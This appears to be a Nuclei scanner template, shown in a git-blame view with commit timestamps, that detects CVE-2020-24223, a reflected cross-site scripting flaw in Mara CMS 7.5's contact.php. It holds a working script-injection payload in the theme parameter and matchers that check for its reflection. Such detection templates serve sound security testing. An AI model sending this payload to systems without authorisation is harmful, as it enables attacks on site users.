2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-24223
|
2020-09-01 18:16:14 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
|
|
|
|
author: pikpikcu
|
2020-09-01 18:31:57 +00:00
|
|
|
severity: medium
|
2021-03-24 06:50:31 +00:00
|
|
|
description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/48777
|
|
|
|
- https://sourceforge.net/projects/maracms/ # vendor homepage
|
|
|
|
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,mara,xss
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.10
|
|
|
|
cve-id: CVE-2020-24223
|
|
|
|
cwe-id: CWE-79
|
2020-09-01 18:16:14 +00:00
|
|
|
|
|
|
|
requests:
|
2020-09-17 09:58:51 +00:00
|
|
|
- method: GET
|
2020-09-01 18:16:14 +00:00
|
|
|
path:
|
2020-09-04 05:55:13 +00:00
|
|
|
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
2020-09-01 18:16:14 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"><script>alert(document.domain)</script>'
|
2020-12-13 19:24:23 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|